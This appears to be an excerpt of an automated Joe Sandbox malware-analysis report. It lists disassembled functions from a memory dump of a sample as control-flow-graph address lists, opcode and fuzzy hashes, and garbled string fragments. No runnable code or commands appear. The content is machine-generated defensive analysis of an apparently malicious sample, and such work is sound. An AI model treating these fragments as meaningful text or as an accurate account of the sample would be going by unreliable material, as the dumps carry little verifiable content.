                                                    control_flow_graph 631 6567e98-6567eb6 632 6567eb8-6567ebb 631->632 633 6567edc-6567edf 632->633 634 6567ebd-6567ed7 632->634 635 6567ef6-6567ef9 633->635 636 6567ee1-6567eef 633->636 634->633 638 6567f1c-6567f1f 635->638 639 6567efb-6567f17 635->639 646 6567ef1 636->646 647 6567f3e-6567f54 636->647 640 6567f21-6567f2b 638->640 641 6567f2c-6567f2e 638->641 639->638 643 6567f35-6567f38 641->643 644 6567f30 641->644 643->632 643->647 644->643 646->635 651 656816f-6568179 647->651 652 6567f5a-6567f63 647->652 653 656817a-65681af 652->653 654 6567f69-6567f86 652->654 657 65681b1-65681b4 653->657 663 656815c-6568169 654->663 664 6567f8c-6567fb4 654->664 658 65681ba-65681c9 657->658 659 65683e9-65683ec 657->659 668 65681cb-65681e6 658->668 669 65681e8-656822c 658->669 661 65683ee-656840a 659->661 662 656840f-6568412 659->662 661->662 666 65684bd-65684bf 662->666 667 6568418-6568424 662->667 663->651 663->652 664->663 684 6567fba-6567fc3 664->684 671 65684c6-65684c9 666->671 672 65684c1 666->672 674 656842f-6568431 667->674 668->669 687 6568232-6568243 669->687 688 65683bd-65683d3 669->688 671->657 675 65684cf-65684d8 671->675 672->671 680 6568433-6568439 674->680 681 6568449-656844d 674->681 682 656843d-656843f 680->682 683 656843b 680->683 685 656844f-6568459 681->685 686 656845b 681->686 682->681 683->681 684->653 690 6567fc9-6567fe5 684->690 689 6568460-6568462 685->689 686->689 697 65683a8-65683b7 687->697 698 6568249-6568266 687->698 688->659 693 6568464-6568467 689->693 694 6568473-65684ac 689->694 701 656814a-6568156 690->701 702 6567feb-6568015 690->702 693->675 694->658 714 65684b2-65684bc 694->714 697->687 697->688 698->697 708 656826c-6568362 call 65666b8 698->708 701->663 701->684 715 6568140-6568145 702->715 716 656801b-6568043 702->716 764 6568364-656836e 708->764 765 6568370 708->765 715->701 716->715 722 6568049-6568077 716->722 722->715 728 656807d-6568086 722->728 728->715 730 656808c-65680be 728->730 737 65680c0-65680c4 730->737 738 65680c9-65680e5 730->738 737->715 739 65680c6 737->739 738->701 740 65680e7-656813e call 65666b8 738->740 739->738 740->701 766 6568375-6568377 764->766 765->766 766->697 767 6568379-656837e 766->767 768 6568380-656838a 767->768 769 656838c 767->769 770 6568391-6568393 768->770 769->770 770->697 771 6568395-65683a1 770->771 771->697
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q
                                                    • API String ID: 0-355816377
                                                    • Opcode ID: 332cc0b9891bd9d689016c41e23662cad88f3a0fbc16c2aaf1c958d3d06a207a
                                                    • Instruction ID: bcd6a077b4ce41a01bf2c56a001028e757d32d5bd39853e0e7236bcf5be0d4a7
                                                    • Opcode Fuzzy Hash: 332cc0b9891bd9d689016c41e23662cad88f3a0fbc16c2aaf1c958d3d06a207a
                                                    • Instruction Fuzzy Hash: D802AE30B002059FDB54DF6AD994AAEB7E2FF84304F148569E409EB395DB31EC86CB91
                                                    Function 06560006 Relevance: 2.0, Instructions: 1981COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 160a8fd2ef54c576fbc94432b84b6b8e120b9b101e2bff95bef332d959711613
                                                    • Instruction ID: d15f20c8eae5a178b4adf931cae055d13a6c25d06ac074c8343f950c61709064
                                                    • Opcode Fuzzy Hash: 160a8fd2ef54c576fbc94432b84b6b8e120b9b101e2bff95bef332d959711613
                                                    • Instruction Fuzzy Hash: 8123F931D10B198ACB11EB69C8905ADF7B1FF99300F15D79AE458B7221EB70AAC5CF81
                                                    Function 06560040 Relevance: 2.0, Instructions: 1965COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc28ba8bd50a5fdf8d7791174292aeb9c2ba0d6377360f6ca1e5071528d55eb2
                                                    • Instruction ID: 58d215a2a5ff0d76d59ec1c1287f3c66f76b3353c95191c6642b3653ae874ae6
                                                    • Opcode Fuzzy Hash: cc28ba8bd50a5fdf8d7791174292aeb9c2ba0d6377360f6ca1e5071528d55eb2
                                                    • Instruction Fuzzy Hash: 2F23F931D10B198ACB11EB69C8905ADF7B1FF99300F15D79AE458B7221EB70AAC5CF81
                                                    Function 065656B0 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1724 65656b0-65656cd 1725 65656cf-65656d2 1724->1725 1726 65656d4-65656da 1725->1726 1727 656570a-656570d 1725->1727 1728 6565893-65658c3 1726->1728 1729 65656e0-65656e8 1726->1729 1730 6565714-6565717 1727->1730 1731 656570f-6565711 1727->1731 1746 65658cd-65658d0 1728->1746 1729->1728 1734 65656ee-65656fb 1729->1734 1732 656572b-656572e 1730->1732 1733 6565719-6565726 1730->1733 1731->1730 1735 6565730-6565736 1732->1735 1736 6565741-6565744 1732->1736 1733->1732 1734->1728 1738 6565701-6565705 1734->1738 1740 656573c 1735->1740 1741 656582d-6565837 1735->1741 1742 6565746-656574d 1736->1742 1743 6565752-6565755 1736->1743 1738->1727 1740->1736 1747 656583e-6565840 1741->1747 1742->1743 1744 6565757-656575d 1743->1744 1745 6565768-656576b 1743->1745 1748 6565763 1744->1748 1749 6565820-6565823 1744->1749 1752 6565777-656577a 1745->1752 1753 656576d-6565776 1745->1753 1750 65658f2-65658f5 1746->1750 1751 65658d2-65658d6 1746->1751 1755 6565845-6565848 1747->1755 1748->1745 1754 6565828-656582b 1749->1754 1758 65658f7-65658fe 1750->1758 1759 6565909-656590c 1750->1759 1756 65659c2-65659d0 1751->1756 1757 65658dc-65658e4 1751->1757 1760 656577c-6565782 1752->1760 1761 656578d-6565790 1752->1761 1754->1741 1754->1755 1769 6565861-6565864 1755->1769 1770 656584a-656585c 1755->1770 1788 65659d2-65659fc 1756->1788 1789 6565a00-6565a01 1756->1789 1757->1756 1771 65658ea-65658ed 1757->1771 1762 6565904 1758->1762 1763 65659ba-65659c1 1758->1763 1765 656592e-6565931 1759->1765 1766 656590e-6565912 1759->1766 1760->1726 1764 6565788 1760->1764 1767 6565792-6565793 1761->1767 1768 6565798-656579b 1761->1768 1762->1759 1764->1761 1776 6565933-6565937 1765->1776 1777 656594f-6565952 1765->1777 1766->1756 1773 6565918-6565920 1766->1773 1767->1768 1774 65657ac-65657af 1768->1774 1775 656579d-65657a1 1768->1775 1769->1735 1772 656586a-656586d 1769->1772 1770->1769 1771->1750 1772->1760 1779 6565873-6565875 1772->1779 1773->1756 1780 6565926-6565929 1773->1780 1783 65657b1-65657b4 1774->1783 1784 65657b9-65657bc 1774->1784 1781 65657a7 1775->1781 1782 6565885-6565892 1775->1782 1776->1756 1785 656593d-6565945 1776->1785 1786 6565954-6565965 1777->1786 1787 656596a-656596d 1777->1787 1793 6565877 1779->1793 1794 656587c-656587f 1779->1794 1780->1765 1781->1774 1783->1784 1796 65657e2-65657e5 1784->1796 1797 65657be-65657dd 1784->1797 1785->1756 1795 6565947-656594a 1785->1795 1786->1787 1798 6565977-656597a 1787->1798 1799 656596f-6565976 1787->1799 1800 65659fe 1788->1800 1791 6565a03-6565a0a 1789->1791 1792 6565a0f-6565a12 1789->1792 1791->1792 1803 6565cfb-6565cfe 1792->1803 1804 6565a18-6565bac 1792->1804 1793->1794 1794->1725 1794->1782 1795->1777 1806 65657e7-65657f6 1796->1806 1807 65657fb-65657fe 1796->1807 1797->1796 1801 6565994-6565997 1798->1801 1802 656597c-6565980 1798->1802 1800->1789 1813 65659a8-65659aa 1801->1813 1814 6565999-65659a3 1801->1814 1802->1756 1810 6565982-656598a 1802->1810 1808 6565d16-6565d19 1803->1808 1809 6565d00-6565d13 1803->1809 1875 6565ce5-6565cf8 1804->1875 1876 6565bb2-6565bb9 1804->1876 1806->1807 1811 6565800-6565816 1807->1811 1812 656581b-656581e 1807->1812 1818 6565d33-6565d36 1808->1818 1819 6565d1b-6565d2c 1808->1819 1810->1756 1817 656598c-656598f 1810->1817 1811->1812 1812->1749 1812->1754 1821 65659b1-65659b4 1813->1821 1822 65659ac 1813->1822 1814->1813 1817->1801 1826 6565d50-6565d53 1818->1826 1827 6565d38-6565d49 1818->1827 1832 6565d2e 1819->1832 1833 6565d7b-6565d82 1819->1833 1821->1746 1821->1763 1822->1821 1826->1804 1831 6565d59-6565d5c 1826->1831 1836 6565d5e-6565d6f 1827->1836 1839 6565d4b 1827->1839 1835 6565d76-6565d79 1831->1835 1831->1836 1832->1818 1837 6565d87-6565d8a 1833->1837 1835->1833 1835->1837 1836->1833 1842 6565d71 1836->1842 1837->1804 1841 6565d90-6565d93 1837->1841 1839->1826 1843 6565d95-6565da6 1841->1843 1844 6565db1-6565db4 1841->1844 1842->1835 1843->1809 1854 6565dac 1843->1854 1846 6565db6-6565dc7 1844->1846 1847 6565dce-6565dd1 1844->1847 1846->1833 1857 6565dc9 1846->1857 1848 6565dd3-6565dd8 1847->1848 1849 6565ddb-6565ddd 1847->1849 1848->1849 1852 6565de4-6565de7 1849->1852 1853 6565ddf 1849->1853 1852->1800 1856 6565ded-6565df6 1852->1856 1853->1852 1854->1844 1857->1847 1877 6565bbf-6565be2 1876->1877 1878 6565c6d-6565c74 1876->1878 1887 6565bea-6565bf2 1877->1887 1878->1875 1879 6565c76-6565ca9 1878->1879 1891 6565cae-6565cdb 1879->1891 1892 6565cab 1879->1892 1889 6565bf7-6565c38 1887->1889 1890 6565bf4 1887->1890 1900 6565c50-6565c61 1889->1900 1901 6565c3a-6565c4b 1889->1901 1890->1889 1891->1856 1892->1891 1900->1856 1901->1856
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-3993045852
                                                    • Opcode ID: 8016b948d1e28f8a64615e728c9b3c809721715197037ccbf6da795b4e5e2c48
                                                    • Instruction ID: 7aadb4758b869a6704b7d45f98480bca009b2a7adc95292986e83ad98f765454
                                                    • Opcode Fuzzy Hash: 8016b948d1e28f8a64615e728c9b3c809721715197037ccbf6da795b4e5e2c48
                                                    • Instruction Fuzzy Hash: 7222D231F402158FDF64DFA5C4846AEBBB2FF85314F208469E44AAB395EA31DD42CB91
                                                    Function 06566708 Relevance: .8, Instructions: 824COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3609d1884a9dd4497b6a805887eeb6566018562a0bf1b9f18871155fed3805b
                                                    • Instruction ID: 64688c6245b412847782d32c998c725d1fd0240b4b014386cc047c6ac4587b7a
                                                    • Opcode Fuzzy Hash: b3609d1884a9dd4497b6a805887eeb6566018562a0bf1b9f18871155fed3805b
                                                    • Instruction Fuzzy Hash: 3262BD34A002058FDB54DB69D594AAEB7F2FF89314F148469E80AEB354DB31ED42CB91
                                                    Function 0656ADE8 Relevance: 10.4, Strings: 8, Instructions: 390COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 656ade8-656ae06 1 656ae08-656ae0b 0->1 2 656ae2e-656ae31 1->2 3 656ae0d-656ae29 1->3 4 656ae37-656ae3a 2->4 5 656b005-656b00e 2->5 3->2 7 656ae4e-656ae51 4->7 8 656ae3c-656ae49 4->8 9 656b014-656b01e 5->9 10 656ae91-656ae9a 5->10 13 656ae62-656ae65 7->13 14 656ae53-656ae57 7->14 8->7 11 656aea0-656aea4 10->11 12 656b01f-656b056 10->12 16 656aea9-656aeac 11->16 27 656b058-656b05b 12->27 19 656ae67-656ae6c 13->19 20 656ae6f-656ae72 13->20 14->9 18 656ae5d 14->18 24 656aeae-656aeb7 16->24 25 656aebc-656aebe 16->25 18->13 19->20 21 656ae74-656ae87 20->21 22 656ae8c-656ae8f 20->22 21->22 22->10 22->16 24->25 28 656aec5-656aec8 25->28 29 656aec0 25->29 31 656b07e-656b081 27->31 32 656b05d-656b079 27->32 28->1 33 656aece-656aef2 28->33 29->28 34 656b083 call 656b3e7 31->34 35 656b090-656b093 31->35 32->31 48 656b002 33->48 49 656aef8-656af07 33->49 40 656b089-656b08b 34->40 36 656b095-656b099 35->36 37 656b0a0-656b0a3 35->37 41 656b09b 36->41 42 656b0a9-656b0e4 36->42 37->42 43 656b30c-656b30f 37->43 40->35 41->37 53 656b2d7-656b2ea 42->53 54 656b0ea-656b0f6 42->54 45 656b311-656b31b 43->45 46 656b31c-656b31e 43->46 50 656b325-656b328 46->50 51 656b320 46->51 48->5 58 656af1f-656af5a call 65666b8 49->58 59 656af09-656af0f 49->59 50->27 55 656b32e-656b338 50->55 51->50 57 656b2ec 53->57 63 656b116-656b15a 54->63 64 656b0f8-656b111 54->64 65 656b2ed 57->65 76 656af72-656af89 58->76 77 656af5c-656af62 58->77 61 656af13-656af15 59->61 62 656af11 59->62 61->58 62->58 81 656b176-656b1b5 63->81 82 656b15c-656b16e 63->82 64->57 65->65 91 656afa1-656afb2 76->91 92 656af8b-656af91 76->92 79 656af66-656af68 77->79 80 656af64 77->80 79->76 80->76 87 656b29c-656b2b1 81->87 88 656b1bb-656b296 call 65666b8 81->88 82->81 87->53 88->87 98 656afb4-656afba 91->98 99 656afca-656affb 91->99 93 656af95-656af97 92->93 94 656af93 92->94 93->91 94->91 101 656afbe-656afc0 98->101 102 656afbc 98->102 99->48 101->99 102->99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-3823777903
                                                    • Opcode ID: 7b1ba6e6b9c8206fd9a40e046873d35f3764c0d7d5d4f08a07dae96b6ff8b82b
                                                    • Instruction ID: 0267befc4cb83011350eb2ca80838aee9f7caeb5fa3afd3023fcc2cf02c8266e
                                                    • Opcode Fuzzy Hash: 7b1ba6e6b9c8206fd9a40e046873d35f3764c0d7d5d4f08a07dae96b6ff8b82b
                                                    • Instruction Fuzzy Hash: 6DE14B30E1020A8FDB69DB69D5806AEB7B2FF85304F108929E409EB355DB75DC86CB91
                                                    Function 06569268 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 257 6569268-656928d 258 656928f-6569292 257->258 259 6569294-65692b3 258->259 260 65692b8-65692bb 258->260 259->260 261 65692c1-65692d6 260->261 262 6569b7b-6569b7d 260->262 269 65692ee-6569304 261->269 270 65692d8-65692de 261->270 263 6569b84-6569b87 262->263 264 6569b7f 262->264 263->258 267 6569b8d-6569b97 263->267 264->263 274 656930f-6569311 269->274 271 65692e2-65692e4 270->271 272 65692e0 270->272 271->269 272->269 275 6569313-6569319 274->275 276 6569329-656939a 274->276 277 656931d-656931f 275->277 278 656931b 275->278 287 65693c6-65693e2 276->287 288 656939c-65693bf 276->288 277->276 278->276 293 65693e4-6569407 287->293 294 656940e-6569429 287->294 288->287 293->294 299 6569454-656946f 294->299 300 656942b-656944d 294->300 305 6569471-6569493 299->305 306 656949a-65694a4 299->306 300->299 305->306 307 65694a6-65694af 306->307 308 65694b4-656952e 306->308 307->267 314 6569530-656954e 308->314 315 656957b-6569590 308->315 319 6569550-656955f 314->319 320 656956a-6569579 314->320 315->262 319->320 320->314 320->315
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: 387d34ba6d1ddf86a32666485f4ce229dddfe6499b77c7ed7958e12d20a33276
                                                    • Instruction ID: 1ddbd2178430b0b2097fc04d96b7a1c173ea983501d09c518d697e5ce65cd840
                                                    • Opcode Fuzzy Hash: 387d34ba6d1ddf86a32666485f4ce229dddfe6499b77c7ed7958e12d20a33276
                                                    • Instruction Fuzzy Hash: 42913930B0020A9FDB54DB65D9907AEB3F6BFC9304F10856AD419EB358EA70DC86CB91
                                                    Function 0656D070 Relevance: 4.6, Strings: 3, Instructions: 801COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 323 656d070-656d08b 324 656d08d-656d090 323->324 325 656d092-656d0a1 324->325 326 656d0d9-656d0dc 324->326 327 656d0a3-656d0a8 325->327 328 656d0b0-656d0bc 325->328 329 656d125-656d128 326->329 330 656d0de-656d120 326->330 327->328 331 656d0c2-656d0d4 328->331 332 656da8d-656dac6 328->332 333 656d137-656d13a 329->333 334 656d12a-656d12c 329->334 330->329 331->326 348 656dac8-656dacb 332->348 337 656d144-656d147 333->337 338 656d13c-656d141 333->338 335 656d132 334->335 336 656d559 334->336 335->333 343 656d55c-656d568 336->343 341 656d190-656d193 337->341 342 656d149-656d18b 337->342 338->337 345 656d195-656d1d7 341->345 346 656d1dc-656d1df 341->346 342->341 343->325 347 656d56e-656d85b 343->347 345->346 350 656d1e1-656d223 346->350 351 656d228-656d22b 346->351 536 656da82-656da8c 347->536 537 656d861-656d867 347->537 353 656daee-656daf1 348->353 354 656dacd-656dae9 348->354 350->351 358 656d274-656d277 351->358 359 656d22d-656d26f 351->359 355 656db24-656db27 353->355 356 656daf3-656db1f 353->356 354->353 363 656db36-656db38 355->363 364 656db29 call 656dbe5 355->364 356->355 365 656d2c0-656d2c3 358->365 366 656d279-656d288 358->366 359->358 371 656db3f-656db42 363->371 372 656db3a 363->372 386 656db2f-656db31 364->386 369 656d2c5-656d2c7 365->369 370 656d2d2-656d2d5 365->370 374 656d297-656d2a3 366->374 375 656d28a-656d28f 366->375 379 656d417-656d420 369->379 380 656d2cd 369->380 381 656d2d7-656d2ed 370->381 382 656d2f2-656d2f5 370->382 371->348 387 656db44-656db53 371->387 372->371 374->332 388 656d2a9-656d2bb 374->388 375->374 394 656d422-656d427 379->394 395 656d42f-656d43b 379->395 380->370 381->382 390 656d2f7-656d339 382->390 391 656d33e-656d341 382->391 386->363 411 656db55-656dbb8 call 65666b8 387->411 412 656dbba-656dbcf 387->412 388->365 390->391 400 656d364-656d367 391->400 401 656d343-656d35f 391->401 394->395 402 656d441-656d455 395->402 403 656d54c-656d551 395->403 400->343 409 656d36d-656d370 400->409 401->400 402->336 427 656d45b-656d46d 402->427 403->336 419 656d372-656d3b4 409->419 420 656d3b9-656d3bc 409->420 411->412 432 656dbd0 412->432 419->420 422 656d405-656d407 420->422 423 656d3be-656d400 420->423 433 656d40e-656d411 422->433 434 656d409 422->434 423->422 444 656d491-656d493 427->444 445 656d46f-656d475 427->445 432->432 433->324 433->379 434->433 454 656d49d-656d4a9 444->454 446 656d477 445->446 447 656d479-656d485 445->447 453 656d487-656d48f 446->453 447->453 453->454 464 656d4b7 454->464 465 656d4ab-656d4b5 454->465 469 656d4bc-656d4be 464->469 465->469 469->336 471 656d4c4-656d4e0 call 65666b8 469->471 481 656d4e2-656d4e7 471->481 482 656d4ef-656d4fb 471->482 481->482 482->403 484 656d4fd-656d54a 482->484 484->336 538 656d876-656d87f 537->538 539 656d869-656d86e 537->539 538->332 540 656d885-656d898 538->540 539->538 542 656da72-656da7c 540->542 543 656d89e-656d8a4 540->543 542->536 542->537 544 656d8a6-656d8ab 543->544 545 656d8b3-656d8bc 543->545 544->545 545->332 546 656d8c2-656d8e3 545->546 549 656d8e5-656d8ea 546->549 550 656d8f2-656d8fb 546->550 549->550 550->332 551 656d901-656d91e 550->551 551->542 554 656d924-656d92a 551->554 554->332 555 656d930-656d949 554->555 557 656da65-656da6c 555->557 558 656d94f-656d976 555->558 557->542 557->554 558->332 561 656d97c-656d986 558->561 561->332 562 656d98c-656d9a3 561->562 564 656d9a5-656d9b0 562->564 565 656d9b2-656d9cd 562->565 564->565 565->557 570 656d9d3-656d9ec call 65666b8 565->570 574 656d9ee-656d9f3 570->574 575 656d9fb-656da04 570->575 574->575 575->332 576 656da0a-656da5e 575->576 576->557
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q
                                                    • API String ID: 0-831282457
                                                    • Opcode ID: b6608b5e1bdafba7b9ab86957d9a4d1db45027834ffa306409ae37b64474ab60
                                                    • Instruction ID: 2eb12a64d3e4b2d4cc89064655c8dd97b022e3341a1b0cef6336271035c127c0
                                                    • Opcode Fuzzy Hash: b6608b5e1bdafba7b9ab86957d9a4d1db45027834ffa306409ae37b64474ab60
                                                    • Instruction Fuzzy Hash: 58622E30B006099FCB55EF69D580A5DB7B2FF85304B248A69D4099F369DB71ED8ACB80
                                                    Function 06564C80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 584 6564c80-6564ca4 585 6564ca6-6564ca9 584->585 586 6564cca-6564ccd 585->586 587 6564cab-6564cc5 585->587 588 6564cd3-6564dcb 586->588 589 65653ac-65653ae 586->589 587->586 607 6564dd1-6564e1e call 656552a 588->607 608 6564e4e-6564e55 588->608 591 65653b5-65653b8 589->591 592 65653b0 589->592 591->585 594 65653be-65653cb 591->594 592->591 621 6564e24-6564e40 607->621 609 6564e5b-6564ecb 608->609 610 6564ed9-6564ee2 608->610 627 6564ed6 609->627 628 6564ecd 609->628 610->594 625 6564e42 621->625 626 6564e4b-6564e4c 621->626 625->626 626->608 627->610 628->627
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fcq$XPcq$\Ocq
                                                    • API String ID: 0-3575482020
                                                    • Opcode ID: 72bf84d0b29e40570aba50517e4473522fb61e2818219446c84926efc51c9e9d
                                                    • Instruction ID: f6228d6bb8042455cd04e0a035e134d5c75c5276a864ec4c309300fb04a8b475
                                                    • Opcode Fuzzy Hash: 72bf84d0b29e40570aba50517e4473522fb61e2818219446c84926efc51c9e9d
                                                    • Instruction Fuzzy Hash: D5617030F002099FEB559FA5C8547AEBBF2FB89700F20842AE106EB395DB758D45CB51
                                                    Function 065408CA Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 877 65408ca-65408f7 878 6540ab2-6540ad6 877->878 879 65408fd-6540906 877->879 884 6540add-6540b78 call 6540550 878->884 883 654090c-6540961 879->883 879->884 892 6540963-6540988 883->892 893 654098b-6540994 883->893 927 6540b7d-6540b82 884->927 892->893 894 6540996 893->894 895 6540999-65409a9 893->895 894->895 932 65409ab call 6540ab8 895->932 933 65409ab call 6540b28 895->933 934 65409ab call 65408ca 895->934 899 65409b1-65409b3 900 65409b5-65409ba 899->900 901 6540a0d-6540a5a 899->901 904 65409f3-6540a06 900->904 905 65409bc-65409f1 900->905 915 6540a61-6540a66 901->915 904->901 905->915 917 6540a70-6540a75 915->917 918 6540a68 915->918 919 6540a77 917->919 920 6540a7f-6540a84 917->920 918->917 919->920 923 6540a86-6540a91 920->923 924 6540a99 920->924 923->924 924->878 932->899 933->899 934->899
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (&^q$(bq
                                                    • API String ID: 0-1294341849
                                                    • Opcode ID: 15a35025b8b45e27d603221f6bed72785f3de44bb131c35ec05926a92f22c1ea
                                                    • Instruction ID: 38f133e3c3e5fe958f69d92b189bd1b8d469b363fe719d6f1bb956a652c6d909
                                                    • Opcode Fuzzy Hash: 15a35025b8b45e27d603221f6bed72785f3de44bb131c35ec05926a92f22c1ea
                                                    • Instruction Fuzzy Hash: AA71A231F002589BCB15EFB9C850AAEBBB6AFC4700F208529E505AB380DF30AD45CB95
                                                    Function 0656925A Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 935 656925a-656928d 936 656928f-6569292 935->936 937 6569294-65692b3 936->937 938 65692b8-65692bb 936->938 937->938 939 65692c1-65692d6 938->939 940 6569b7b-6569b7d 938->940 947 65692ee-6569304 939->947 948 65692d8-65692de 939->948 941 6569b84-6569b87 940->941 942 6569b7f 940->942 941->936 945 6569b8d-6569b97 941->945 942->941 952 656930f-6569311 947->952 949 65692e2-65692e4 948->949 950 65692e0 948->950 949->947 950->947 953 6569313-6569319 952->953 954 6569329-656939a 952->954 955 656931d-656931f 953->955 956 656931b 953->956 965 65693c6-65693e2 954->965 966 656939c-65693bf 954->966 955->954 956->954 971 65693e4-6569407 965->971 972 656940e-6569429 965->972 966->965 971->972 977 6569454-656946f 972->977 978 656942b-656944d 972->978 983 6569471-6569493 977->983 984 656949a-65694a4 977->984 978->977 983->984 985 65694a6-65694af 984->985 986 65694b4-656952e 984->986 985->945 992 6569530-656954e 986->992 993 656957b-6569590 986->993 997 6569550-656955f 992->997 998 656956a-6569579 992->998 993->940 997->998 998->992 998->993
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q
                                                    • API String ID: 0-355816377
                                                    • Opcode ID: e4e1fc4ea9f73309958665a3fa0cfa305c8a86a2793e907e54e993c640c64b23
                                                    • Instruction ID: c665fa2d05798320188732785e2518a1b03123c088e0201fb0d538a399ca6546
                                                    • Opcode Fuzzy Hash: e4e1fc4ea9f73309958665a3fa0cfa305c8a86a2793e907e54e993c640c64b23
                                                    • Instruction Fuzzy Hash: 3C513B30B002069FDB54DB65D990BAEB7F6EBC8344F10856AD419EB398DA30DC47CB95
                                                    Function 06564C71 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1001 6564c71-6564ca4 1002 6564ca6-6564ca9 1001->1002 1003 6564cca-6564ccd 1002->1003 1004 6564cab-6564cc5 1002->1004 1005 6564cd3-6564dcb 1003->1005 1006 65653ac-65653ae 1003->1006 1004->1003 1024 6564dd1-6564e1e call 656552a 1005->1024 1025 6564e4e-6564e55 1005->1025 1008 65653b5-65653b8 1006->1008 1009 65653b0 1006->1009 1008->1002 1011 65653be-65653cb 1008->1011 1009->1008 1038 6564e24-6564e40 1024->1038 1026 6564e5b-6564ecb 1025->1026 1027 6564ed9-6564ee2 1025->1027 1044 6564ed6 1026->1044 1045 6564ecd 1026->1045 1027->1011 1042 6564e42 1038->1042 1043 6564e4b-6564e4c 1038->1043 1042->1043 1043->1025 1044->1027 1045->1044
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fcq$XPcq
                                                    • API String ID: 0-936005338
